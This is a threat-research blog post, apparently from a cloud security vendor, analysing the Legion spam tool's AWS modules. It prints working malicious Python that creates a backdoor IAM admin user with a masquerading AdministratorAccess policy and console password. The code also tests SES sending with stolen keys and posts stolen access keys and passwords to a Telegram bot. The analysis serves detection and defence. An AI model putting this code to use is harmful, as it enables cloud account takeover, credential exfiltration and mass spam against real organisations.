Complimentary LUCR-3 (Scattered Spider) Threat Briefings

GET THE THREAT BRIEFING
Illustration Cloud

Legion: The Latest Threat in Mass Spam Attacks

Summary

As the old proverb says, “Great minds think alike”. Many people may not know or remember the second half of that proverb, “Fools seldom differ.” Both sides of these adages are very well represented throughout this article. Researchers (great minds) from Permiso and Cado security simultaneously stumbled onto a new attack tool, dramatically called Legion, that is focused on mail abuse and SMS spam via services like Amazon SES and Twilio. This tool looks eerily similar (Fools seldom differ) to Andr0xGhost, Greenbot, VIOLENT, and a few other for sale spam attack scripts.

In the spirit of collaboration, Cado and Permiso researchers are tag teaming a breakdown of Legion’s toolset. Since we (Permiso) have already talked at length about similar variants, the rest of this article will dive into some of the differences of Legion compared to AndroxGh0st and Greenbot. For a full breakdown of Legion specifically, head over to the Cado Security blog.

Legion Modules

Legion has many different modules for various technologies. In this article we are going to focus on a few of the modules that are specific to AWS. If you would like to ride along, you can find this script on VirusTotal (MD5: ddc6963f98e57090e0a78559c7212498).

Persistence

Our favorite feature in these scripts is the persistence. Legion is mostly using the same playbook as similar tools, with one extra little touch: they add tags to the IAM user they create.

create_new_user

By default, Legion creates a user named ses_legion for persistence. One thing that stands out with Legion compared to other similar tools is that it also adds the tag: Owner:ms.boharas to the created user. While it is often hard to understand the motivations of the attacker, we suspect this was added to evade detections that looks for users that have been created with no tags associated to them.

def create_new_user(iam_client, user_name='ses_legion'):
        user = None
        try:
                user = iam_client.create_user(
                        UserName=user_name,
                        Tags=[{'Key': 'Owner', 'Value': 'ms.boharas'}]
                    )
        except ClientError as e:
                if e.response['Error']['Code'] == 'EntityAlreadyExists':
                        result_str = get_random_string()
                        user_name = 'ses_{}'.format(result_str)
                        user = iam_client.create_user(UserName=user_name,
                        Tags=[{'Key': 'Owner', 'Value': 'ms.boharas'}]
                    )
        return user_name, user

creat_new_group

Legion creates a group with the name SESAdminGroup . Attackers often use generic names like this for groups, policy and user creations.

def creat_new_group(iam_client, group_name='SESAdminGroup'):
        try:
                res = iam_client.create_group(GroupName=group_name)
        except ClientError as e:
                if e.response['Error']['Code'] == 'EntityAlreadyExists':
                        result_str = get_random_string()
                        group_name = "SESAdminGroup{}".format(result_str)
                        res = iam_client.create_group(GroupName=group_name)
        return res['Group']['GroupName']

creat_new_policy

Legion creates a policy named AdministratorAccess if it doesn’t already exist to allow for all actions against all resources. This is an attempt to masquerade as the default AdministratorAccess AWS managed policy.

def creat_new_policy(iam_client, policy_name='AdministratorAccess'):
        policy_json = {"Version": "2012-10-17","Statement":
        [{"Effect": "Allow", "Action": "*","Resource": "*"}]}
        try:
                res = iam_client.create_policy(
                        PolicyName=policy_name,
                        PolicyDocument=json.dumps(policy_json)
                        )
        except ClientError as e:
                if e.response['Error']['Code'] == 'EntityAlreadyExists':
                        result_str = get_random_string()
                        policy_name = "AdministratorAccess{}".format(result_str)
                        res = iam_client.create_policy(PolicyName=policy_name,
                                PolicyDocument=json.dumps(policy_json)
                                )
        return res['Policy']['Arn']

creat_profile

When setting a password for the created user, Legion sets the reset required to false.

def creat_profile(iam_client, user_name, pwd):
        response = iam_client.create_login_profile(
            UserName=user_name, Password=pwd, PasswordResetRequired=False)
        return response

initialize_item

Of note in the initialize function, Legion defaults to using the us-east-1 region. This is configurable though.

def initialize_item(item, service='ses'):
        ACCESS_ID = item['id']
        ACCESS_KEY = item['key']
        REGION = item['region']
        if REGION is None:
                REGION = 'us-east-1'
        try:
                return boto3.client(service, region_name=REGION,
                        aws_access_key_id=ACCESS_ID,
                        aws_secret_access_key=ACCESS_KEY
                        )
        except Exception:
                return

make_user

The make_user function pulls this all together:

  • Creates a new user with the name ses_legion and the tag Owner:ms.boharas

  • Creates a group with the name SESAdminGroup

  • Creates a policy called AdministratorAccess that gives full access

  • Attaches the policy directly to ses_legion IAM user

  • Sets a password

  • Creates a login profile for console access abilities

  • Adds the ses_legion IAM User to the group SESAdminGroup

  • Logs the result of this activity to a Telegram bot

def make_user(iam_client, item, limit_data):
        try:
                user_name, user_data = create_new_user(iam_client)
                grp_name = creat_new_group(iam_client)
                policy_arn = creat_new_policy(iam_client)
                up = att_usr_policy(iam_client, user_name, policy_arn)
                password = "{}0089#".format(user_name)
                profile = creat_profile(iam_client, user_name, password)
                added_to_grp = att_usr_grp(iam_client, user_name, grp_name)

                if user_data:
                        user_arn = user_data['User']['Arn']
                        user_id = None
                        if user_arn:
                                user_id = user_arn.split(':')[4]

                        with open('AWS_ByPass/!Users_Cracked.txt', 'a') as tt:
                                dd = json.dumps(user_data, indent=4, sort_keys=True, default=default)
                                data = ("ACESS_ID={}\nACCESS_KEY={}\nREGION={}\nAmazon IAM User & Pass\n"
                                        "Username={}\nPassword={}\nID={}\n")\
                                .format(item['id'], item['key'], item['region'],user_name, password, user_id)
                                tt.write(data + "\n")
                                tt.write(dd + "\n\n")
                                tt.write("Limit for user:\n")
                                if limit_data:
                                        tt.write(limit_data + "\n")
                                tt.write("{}\n".format("*" * 10))

                                message = {'text': f"🔥  Legion SMTP 6.5 BOT [AWS Console]\n🏦 Amazon IAM User & Pass\n\nUser: {user_name}\nPass= {password}\nIAM= {user_id}\n\nACESS_ID= {item['id']}\nACCESS_KEY= {item['key']}\nREGION= {item['region']}\nAWS Console Hacked ❤\n"}
                                requests.post("https://api.telegram.org/bot" + bot_token +"/sendMessage?chat_id=" + chat_id ,data=message)
                                print(f"{yl}[{fc}AWS CHECKER{yl}] {gr}CREATED ID: {fc}{item['id']} {gr}and Access Token/UserID {fc}{user_id}")
        except IOError as e:
                print(f"{yl}[{fc}AWS CHECKER{yl}] {red}Error writing to file for new {fc}USER")
        except ClientError as e:
                print(f"{yl}[{fc}AWS CHECKER{yl}] {red}Failed to create user with ID: {fc}{item['id']}")
        except Exception as e:
                print(f"{yl}[{fc}AWS CHECKER{yl}] {red}Create Failed: {item['id']}")

Amazon Simple Email Service (SES) Abuse

One of the goals of Legion is to abuse SES in order to send mass spam emails. The modules below are part of this functionality.

check_limit

Legion assesses the email sending capability of an account by examining the Max24HourSend response element. A response value of 200 in Max24HourSend signifies that the key and account are in a sandbox status, which will not provide a means of abuse. Any other value greater than 200 may indicate a potential for attack. If the account is not in a sandbox status, Legion can analyze the output of the SentLast24Hours response element to determine the number of remaining messages that can be sent within 24 hours after subtracting the value from Max24HourSend. However, as a spoiler, it doesn’t appear legion entirely understood the idea of the sandbox or they didn’t care and prefer to let the script error until it moves on to the next account.

def check_limit(ses_client, item):
        try:
                l = ses_client.get_send_quota()
                return f"{item['id']}:{item['key']}:{item['region']}:{l['SentLast24Hours']}/{l['Max24HourSend']} Remaining"
        except Exception as e:
                print(f"{yl}[{fc}AWS CHECKER{yl}] {red}Limit Failed: {item['id']}")

check_sending

Somewhat self explanatory, Legion wants to verify the data and send a message. To do this, they send an email with the available sender and receiver data they have. A successful email, which means the email was accepted for delivery, will return a messageId response element which Legion later uses before writing the successful details to file.

def check_sending(client, receiver, sender, item, limit_info, iam):
        subj = f"{item['id']}"
        msg = f"*** SMTP DATA ***\n\n"\
        f"{item['id']}:{item['key']}:email-smtp.{item['region']}.amazonaws.com:587\n\n"\
        f"AWS_ID:     {item['id']}\nAWS_KEY:    "\
        f"{item['key']}\nAWS_REGION: {item['region']}\nFROM:       {sender}\n"\
        f"SERVER:     email-{item['region']}.amazonaws.com\nPORT:       587 or 25\n\n"\
        f"IAM_USER:   {iam}\n\nLimit Info: {limit_info}"
        try:
                return client.send_email(
                        Source=sender,
                        Destination={'ToAddresses': receiver},
                        Message={
                        'Subject': {'Data': f'SMTP_KEY: email-smtp.{item["region"]}.amazonaws.com',
                        'Charset': 'UTF-8'},
                        'Body': {'Text': {
                        'Data': msg,
                        'Charset': 'UTF-8'
                        },
                        }
                }
            )
        except Exception as e:
                pass

get_identities, fetch_user, process, begin_check

In the final functions around SES Abuse, Legion starts by returning a list of identities via get_identities. fetch_user is used to verify a user creation process as part of begin_check, the created user is based on the obtained credentials and written to a file along with the data from check_limit. Why Legion chooses to write the limit details along with the user is unclear, we’ll note now that the SES send quota is not per user but per account. The process function brings many of the previous steps together and is later called by begin_check if the result of check_limit exists. While Legion checks that the limit data exists several times leading up to the process call, they do it again once in the function before also running get_identities and looping through the identities as the sender for the check_sending function. If a messageId is returned from check_sending they consider this a success and write to the success file !Good_ses_smtp.txt, otherwise they look to write output to the failed file !BAD_ses_smtp.txt and post the failed information to there telegram chat. It’s here Legion could have saved time in knowing that sandbox would have always failed unless sending to verified emails or domains.

def get_identities(client):
        try:
                return client.list_identities()['Identities']
        except Exception:
                pass

def fetch_user(client):
        try:
                return client.get_user()['User']
        except Exception:
                pass

def process(ses_client, receiver, item, limit=None, iam=None):
        if limit:
                limit = limit.split(':')[3]
        idt = get_identities(ses_client)
        res = None
        if idt:
                for fr in idt:
                        res = check_sending(ses_client, receiver, fr, item, limit, iam)
                        if res:
                                with open('AWS_ByPass/!Good_ses_smtp.txt', 'a') as lr:
                                        sm = f"{item['id']}:{item['key']}:email-{item['region']}-1.amazonaws.com:{fr}:587:{limit}\n"
                                        lr.write(sm)
                                print(f"{yl}[{fc}AWS CHECKER{yl}] {gr}SENDING SUCCESSFUL: {yl}{item['id']} : {gr}{limit}")
                                break
                if not res:
                        with open('AWS_ByPass/!BAD_ses_smtp.txt', 'a') as lr:
                                sm = f"{item['id']}:{item['key']}:{item['region']}\n"
                                message = {'text': f"🔥  Legion SMTP 6.5 BOT [AWS STATUS]\n🏦 KEY= {item['id']}\nSECRET= {item['key']}\nREGION= {item['region']}\nSTATUS=> Sending Paused ⛔\n"}
                                requests.post("https://api.telegram.org/bot" + bot_token +"/sendMessage?chat_id=" + chat_id ,data=message)

                                lr.write(sm)
                                print(f"{yl}[{fc}AWS CHECKER{yl}]  {red}Sending Failed: {yl}{sm}")

def begin_check(d, to=emailnow):
        item = {}
        limit = None
        data = d.split(':')
        total = len(data)
        bcode = 'TEVHSU9OIDYuNg=='
        receiver = [to, base64.b64decode(bcode).decode('utf-8')]
        iam_user = None
        if total >= 3:
                if data[2]:
                        item['id'] = data[0]
                        item['key'] = data[1]
                        item['region'] = data[2]
                        ses_client = initialize_item(item)
                        if ses_client:
                                limit = check_limit(ses_client, item)
                        iam_client = initialize_item(item, service='iam')
                        if iam_client:
                                mu = make_user(iam_client, item, limit)
                                iam = fetch_user(iam_client)
                        if limit:
                                remain = limit.split(':')[3]
                                print(f"{yl}[{fc}AWS CHECKER{yl}]  {fc}Limit for {item['id']}: {remain}")
                                process(ses_client, receiver, item, limit=limit, iam=None)
                        else:
                                print(f"{yl}[{fc}AWS CHECKER{yl}]  {red}Failed limit check: {item['id']}")
                                process(ses_client, receiver, item, limit=None, iam=None)
        else:
                print(f"[!] Skipped: {d}")

Conclusion

Mail and SMS abuse are big business for attackers. We have come across close to a dozen variants of similar scripts that are being sold regularly for nefarious purposes. Legion is not the first nor will it be the last. Luckily with the amount of similarities in these toolsets, the methodology based detections we put in place and described in /blog/s/approach-to-detection-androxgh0st-greenbot-persistence are resilient enough to to detect all the variants we have discovered so far being used against any of our clients here at Permiso.

Illustration Cloud

Related Articles

Introducing CloudGrappler: A Powerful Open-Source Threat Detection Tool for Cloud Environments

IntroductionWith the increased activity of threat actor groups like LUCR-3 (Scattered Spider) over the last year, being able to detect the presence of these threat groups in cloud environments continues to present a significant challenge to most

Azure Logs: Breaking Through the Cloud Cover

Permiso consistently observes that engineers and analysts often struggle with interpreting Azure Monitor Activity Logs, facing confusion and achieving only a partial understanding even after gaining experience. To address this, Permiso aims to level

Privileged Identity Management (PIM): For Many, a False Sense of Security

Privileged Identity Management (PIM): PIM is described as a service within Microsoft Entra ID, designed to manage, control, and monitor access to crucial organizational resources, encompassing Microsoft Entra ID, Azure, and other Microsoft Online

View more posts